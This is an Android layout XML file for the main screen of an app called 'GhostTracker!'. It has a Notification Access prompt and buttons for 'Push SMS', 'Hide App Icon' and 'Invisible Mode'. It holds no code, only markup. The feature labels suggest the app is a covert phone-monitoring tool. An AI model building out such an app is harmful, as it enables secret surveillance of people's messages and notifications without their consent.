<?xml version="1.0" encoding="utf-8"?>
<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    xmlns:app="http://schemas.android.com/apk/res-auto"
    android:paddingEnd="5dp"
    android:paddingStart="5dp"
    android:background="@color/colorBackground"
    android:id="@+id/main">

    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="match_parent"
        android:orientation="vertical">

        <RelativeLayout
            android:layout_width="match_parent"
            android:layout_height="match_parent">

            <TextView
                android:id="@+id/hello_title"
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"
                android:text="Hello' User."
                android:textSize="30dp"
                android:layout_marginStart="10dp"
                android:layout_marginTop="25dp"
                android:textStyle="bold"
                android:textColor="@color/textTitle"/>

            <TextView
                android:id="@+id/statusText"
                android:layout_below="@id/hello_title"
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"
                android:text="GhostTracker!"
                android:textColor="@color/textSecondary"
                android:textSize="18sp"
                android:textStyle="bold"
                android:layout_gravity="center"
                android:layout_marginStart="10dp"/>


            <TextView
                android:id="@+id/assistText"
                android:layout_below="@id/hello_title"
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"
                android:text="How can I assist you right now?"
                android:visibility="gone"
                android:textColor="@color/textSecondary"
                android:textSize="20sp"
                android:textStyle="normal"
                android:layout_gravity="center"
                android:layout_marginStart="18dp"/>

        </RelativeLayout>

        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:orientation="vertical"
            android:layout_marginTop="8dp"
            tools:ignore="MissingConstraints">

            <RelativeLayout
                android:id="@+id/btnNotification"
                android:layout_marginStart="10dp"
                android:layout_marginTop="10dp"
                android:layout_marginEnd="10dp"
                android:layout_width="match_parent"
                android:background="@drawable/card_item_bg2"
                android:layout_height="150dp">

                <RelativeLayout
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:layout_alignParentBottom="true"
                    android:layout_marginStart="15dp"
                    android:layout_marginEnd="10dp"
                    android:layout_marginBottom="15dp">

                    <com.airbnb.lottie.LottieAnimationView
                        android:id="@+id/lottieAnimationView"
                        android:layout_width="150dp"
                        android:layout_height="150dp"
                        android:layout_centerHorizontal="true"
                        android:layout_alignParentEnd="true"
                        app:lottie_autoPlay="true"
                        app:lottie_loop="true"
                        app:lottie_rawRes="@raw/lottie"
                        android:layout_marginTop="20dp" />

                    <TextView
                        android:id="@+id/diss"
                        android:layout_width="match_parent"
                        android:layout_height="wrap_content"
                        android:text="Please enable Notification Access for this app to work properly."
                        android:textSize="14sp"
                        android:textColor="@color/textSecondary"
                        android:layout_alignParentStart="true"
                        android:layout_marginTop="5dp"
                        android:layout_alignParentBottom="true"
                        android:layout_marginEnd="150dp" />

                    <TextView
                        android:layout_above="@id/diss"
                        android:layout_width="match_parent"
                        android:layout_height="wrap_content"
                        android:text="Notification Access"
                        android:textSize="22dp"
                        android:layout_marginBottom="8dp"
                        android:textColor="@color/textSecondary"
                        android:textStyle="normal"/>

                </RelativeLayout>

            </RelativeLayout>

            <LinearLayout
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:padding="10dp"
                android:layout_marginTop="5dp"
                android:orientation="horizontal">

                <RelativeLayout
                    android:layout_width="match_parent"
                    android:layout_weight="1"
                    android:layout_marginEnd="5dp"
                    android:background="@drawable/card_item_bg2"
                    android:layout_height="80dp"
                    app:cardCornerRadius="10dp">

                    <RelativeLayout
                        android:id="@+id/btnSms"
                        android:layout_width="match_parent"
                        android:layout_height="match_parent"
                        android:foreground="?attr/selectableItemBackground"
                        android:clickable="true">

                        <RelativeLayout
                            android:layout_width="match_parent"
                            android:layout_height="wrap_content"
                            android:layout_alignParentBottom="true"
                            android:layout_marginStart="15dp"
                            android:layout_marginEnd="10dp"
                            android:layout_marginBottom="15dp">

                            <TextView
                                android:layout_width="match_parent"
                                android:layout_height="wrap_content"
                                android:text="Push SMS"
                                android:textSize="18dp"
                                android:textColor="@color/textSecondary"
                                android:textStyle="normal"
                                android:layout_alignParentBottom="true"/>

                        </RelativeLayout>

                    </RelativeLayout>

                </RelativeLayout>

                <RelativeLayout
                    android:id="@+id/btnHide"
                    android:layout_width="match_parent"
                    android:layout_height="80dp"
                    android:layout_weight="1"
                    android:foreground="?attr/selectableItemBackground"
                    android:clickable="true"
                    android:background="@drawable/card_item_bg2"
                    android:layout_marginStart="5dp"
                    app:cardCornerRadius="10dp">

                    <RelativeLayout
                        android:layout_width="match_parent"
                        android:layout_height="match_parent"
                        app:cardElevation="6dp">

                        <RelativeLayout
                            android:layout_width="match_parent"
                            android:layout_height="wrap_content"
                            android:layout_alignParentBottom="true"
                            android:layout_marginStart="15dp"
                            android:layout_marginEnd="10dp"
                            android:layout_marginBottom="15dp">

                            <TextView
                                android:layout_width="match_parent"
                                android:layout_height="wrap_content"
                                android:text="Hide App Icon"
                                android:textSize="18dp"
                                android:textColor="@color/textSecondary"
                                android:textStyle="normal"
                                android:layout_alignParentBottom="true"/>

                        </RelativeLayout>

                    </RelativeLayout>

                </RelativeLayout>

            </LinearLayout>

            <LinearLayout
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:padding="10dp"
                android:layout_marginTop="0dp"
                android:orientation="horizontal">

                <RelativeLayout
                    android:layout_width="match_parent"
                    android:layout_weight="1"
                    android:layout_marginEnd="5dp"
                    android:background="@drawable/card_item_bg2"
                    android:layout_height="80dp"
                    app:cardCornerRadius="10dp">

                    <RelativeLayout
                        android:id="@+id/btnInvisible"
                        android:layout_width="match_parent"
                        android:layout_height="match_parent"
                        android:foreground="?attr/selectableItemBackground"
                        android:clickable="true">

                        <RelativeLayout
                            android:layout_width="match_parent"
                            android:layout_height="wrap_content"
                            android:layout_alignParentBottom="true"
                            android:layout_marginStart="15dp"
                            android:layout_marginEnd="10dp"
                            android:layout_marginBottom="15dp">

                            <TextView
                                android:layout_width="match_parent"
                                android:layout_height="wrap_content"
                                android:text="Invisible Mode"
                                android:textSize="18dp"
                                android:textColor="@color/textSecondary"
                                android:textStyle="normal"
                                android:layout_alignParentBottom="true"/>

                        </RelativeLayout>

                    </RelativeLayout>

                </RelativeLayout>

                <RelativeLayout
                    android:alpha="0"
                    android:layout_width="match_parent"
                    android:layout_height="80dp"
                    android:layout_weight="1"
                    android:foreground="?attr/selectableItemBackground"
                    android:clickable="true"
                    android:background="@drawable/card_item_bg2"
                    android:layout_marginStart="5dp"
                    app:cardCornerRadius="10dp">

                </RelativeLayout>

            </LinearLayout>

        </LinearLayout>

    </LinearLayout>

</ScrollView>
